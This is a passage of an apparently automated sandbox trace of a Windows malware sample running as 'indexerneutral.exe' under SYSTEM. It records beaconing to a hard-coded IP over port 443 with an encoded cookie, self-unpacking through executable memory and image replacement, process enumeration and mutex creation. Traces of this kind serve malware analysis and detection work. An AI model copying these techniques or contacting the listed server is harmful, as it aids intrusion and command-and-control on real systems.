.NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 151 [0163.884] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0165.335] InternetConnectW (hInternet=0xcc0004, lpszServerName="41.57.104.182", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0165.383] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0165.384] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: 31289=S5OWr445xHF3DNguH4sL9G2FbFifvNR7QzxcAcg94GE9jkGyxbjhBZTocWeNpR5o0w0mrMwt0O61+5EpdWNVaC9OKugSiCbGQOT1/uj5Jucf4/TJE6Glz79uMj4/ZwIexBb48g7e7Ubx5Hc0teUaZhiA2Y9V1hKEriQ6jKbFPue3pWWryaCaaOq6RruiEf11wemjyd5bXl54cAolLwtOLjYJzl6DETTMKnT/1ggGZsbiMmg+VboNFtK+szjBGZS8YVBegE90vYcrcxQ/28NfkTVZ9hOAIBSBgaON4CEq0QlLMKfddPaz5msAovmy5WpESJCRMc3AaktO5DTjMVgSxQombjAqzXXGm0IlucnGYVkqlL2AsEms5aFNsaC4cwYBE1SOpg==", dwHeadersLength=0xffffffff, lpOptional=0x0, dwOptionalLength=0x0) Thread: id = 447 os_tid = 0xc84 Thread: id = 455 os_tid = 0xa44 Thread: id = 460 os_tid = 0xd94 Thread: id = 492 os_tid = 0xed8 Thread: id = 493 os_tid = 0xed0 Thread: id = 494 os_tid = 0xee8 Process: id = "24" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x156ec000" os_pid = "0x500" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3461 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3462 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3463 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3464 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3465 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3466 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3467 start_va = 0x77510000 end_va = 0x77688fff entry_point = 0x77510000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3468 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3469 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3470 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3471 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3472 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3473 start_va = 0x7fff0000 end_va = 0x7fff9f1bffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3474 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3475 start_va = 0x7fff9f382000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007fff9f382000" filename = "" Region: id = 3605 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3606 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3607 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3608 start_va = 0x72130000 end_va = 0x721a2fff entry_point = 0x72130000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3609 start_va = 0x721b0000 end_va = 0x721fefff entry_point = 0x721b0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3610 start_va = 0x72200000 end_va = 0x72207fff entry_point = 0x72200000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3611 start_va = 0x500000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3612 start_va = 0x76320000 end_va = 0x76495fff entry_point = 0x76320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3613 start_va = 0x765f0000 end_va = 0x766dffff entry_point = 0x765f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3614 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3615 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3616 start_va = 0x74510000 end_va = 0x745a0fff entry_point = 0x74510000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3617 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3626 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3627 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3628 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 3629 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3630 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3631 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3632 start_va = 0x74640000 end_va = 0x746ebfff entry_point = 0x74640000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3633 start_va = 0x75e60000 end_va = 0x75f1dfff entry_point = 0x75e60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3634 start_va = 0x760f0000 end_va = 0x7616afff entry_point = 0x760f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3635 start_va = 0x76210000 end_va = 0x76252fff entry_point = 0x76210000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3636 start_va = 0x764c0000 end_va = 0x765dffff entry_point = 0x764c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3637 start_va = 0x76af0000 end_va = 0x76c3cfff entry_point = 0x76af0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3638 start_va = 0x77310000 end_va = 0x7744ffff entry_point = 0x77310000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3639 start_va = 0x774e0000 end_va = 0x7750afff entry_point = 0x774e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3640 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3641 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3642 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3643 start_va = 0x600000 end_va = 0x787fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3644 start_va = 0x790000 end_va = 0x910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 3645 start_va = 0x920000 end_va = 0x9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 3646 start_va = 0xb90000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3647 start_va = 0x3e0000 end_va = 0x3f4fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3648 start_va = 0x480000 end_va = 0x493fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3649 start_va = 0x4a0000 end_va = 0x4b9fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 3650 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3651 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3652 start_va = 0x9e0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 3653 start_va = 0x430000 end_va = 0x433fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3654 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3655 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3656 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3657 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3658 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3659 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3660 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3661 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3662 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3663 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3664 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3665 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3666 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3667 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3668 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3669 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3670 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3671 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3672 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3673 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3674 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3675 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3676 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3677 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Thread: id = 499 os_tid = 0x504 [0208.547] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="interface\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}", phkResult=0x45214c | out: phkResult=0x45214c*=0xc8) returned 0x0 [0208.599] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0208.599] RegQueryValueExW (in: hKey=0xc8, lpValueName="", lpReserved=0x0, lpType=0x19ff54, lpData=0x19fcf0, lpcbData=0x19ff4c*=0x12c | out: lpType=0x19ff54*=0x1, lpData="IActiveScriptParseProcedure32", lpcbData=0x19ff4c*=0x3c) returned 0x0 [0208.650] VirtualAlloc (lpAddress=0x0, dwSize=0x14800, flAllocationType=0x3000, flProtect=0x40) returned 0x3e0000 [0210.397] GetProcAddress (hModule=0x765f0000, lpProcName="LoadLibraryExA") returned 0x76609f60 [0210.397] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x765f0000 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="mknjht34tfserdgfwGetProcAddress") returned 0x0 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="GetProcAddress") returned 0x76607940 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualAlloc") returned 0x76608b70 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="LoadLibraryExA") returned 0x76609f60 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="SetFilePointer") returned 0x76616530 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="lstrlenA") returned 0x76613a30 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="lstrcatA") returned 0x7660efc0 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualProtect") returned 0x76608c50 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="UnmapViewOfFile") returned 0x766094b0 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="GetModuleHandleA") returned 0x76609640 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="WriteFile") returned 0x76616590 [0210.398] GetProcAddress (hModule=0x765f0000, lpProcName="CloseHandle") returned 0x76615f20 [0210.399] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualFree") returned 0x76608c70 [0210.399] GetProcAddress (hModule=0x765f0000, lpProcName="GetTempPathA") returned 0x76616410 [0210.399] GetProcAddress (hModule=0x765f0000, lpProcName="CreateFileA") returned 0x76616170 [0210.399] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualAlloc") returned 0x76608b70 [0210.399] VirtualAlloc (lpAddress=0x0, dwSize=0x13a00, flAllocationType=0x3000, flProtect=0x40) returned 0x480000 [0210.400] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x4a0000 [0210.402] VirtualProtect (in: lpAddress=0x1000, dwSize=0xf744, flNewProtect=0x9088158b, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0210.402] VirtualProtect (in: lpAddress=0x11000, dwSize=0xb00, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0210.402] VirtualProtect (in: lpAddress=0x12000, dwSize=0x6600, flNewProtect=0x4290880d, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0210.402] VirtualProtect (in: lpAddress=0x19000, dwSize=0x614, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0210.402] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0210.403] VirtualAlloc (lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0210.407] GetCurrentProcessId () returned 0x500 [0210.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcc [0210.409] Process32FirstW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.410] GetCurrentProcessId () returned 0x500 [0210.410] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.410] GetCurrentProcessId () returned 0x500 [0210.410] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.411] GetCurrentProcessId () returned 0x500 [0210.411] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.411] GetCurrentProcessId () returned 0x500 [0210.411] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.411] GetCurrentProcessId () returned 0x500 [0210.411] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.412] GetCurrentProcessId () returned 0x500 [0210.412] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.412] GetCurrentProcessId () returned 0x500 [0210.412] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x190, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.412] GetCurrentProcessId () returned 0x500 [0210.412] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.424] GetCurrentProcessId () returned 0x500 [0210.424] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.425] GetCurrentProcessId () returned 0x500 [0210.425] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.425] GetCurrentProcessId () returned 0x500 [0210.425] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0210.425] GetCurrentProcessId () returned 0x500 [0210.425] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.426] GetCurrentProcessId () returned 0x500 [0210.426] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.426] GetCurrentProcessId () returned 0x500 [0210.426] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.426] GetCurrentProcessId () returned 0x500 [0210.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.427] GetCurrentProcessId () returned 0x500 [0210.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.427] GetCurrentProcessId () returned 0x500 [0210.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.428] GetCurrentProcessId () returned 0x500 [0210.428] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x314, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0210.428] GetCurrentProcessId () returned 0x500 [0210.428] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.428] GetCurrentProcessId () returned 0x500 [0210.428] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.429] GetCurrentProcessId () returned 0x500 [0210.429] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.429] GetCurrentProcessId () returned 0x500 [0210.429] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.430] GetCurrentProcessId () returned 0x500 [0210.430] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0210.430] GetCurrentProcessId () returned 0x500 [0210.430] CloseHandle (hObject=0xcc) returned 1 [0210.430] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEM1E0") returned 6 [0210.430] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEM1E0") returned 0xcc [0210.430] GetLastError () returned 0x0 [0210.430] CloseHandle (hObject=0xcc) returned 1 [0210.430] _snwprintf (in: 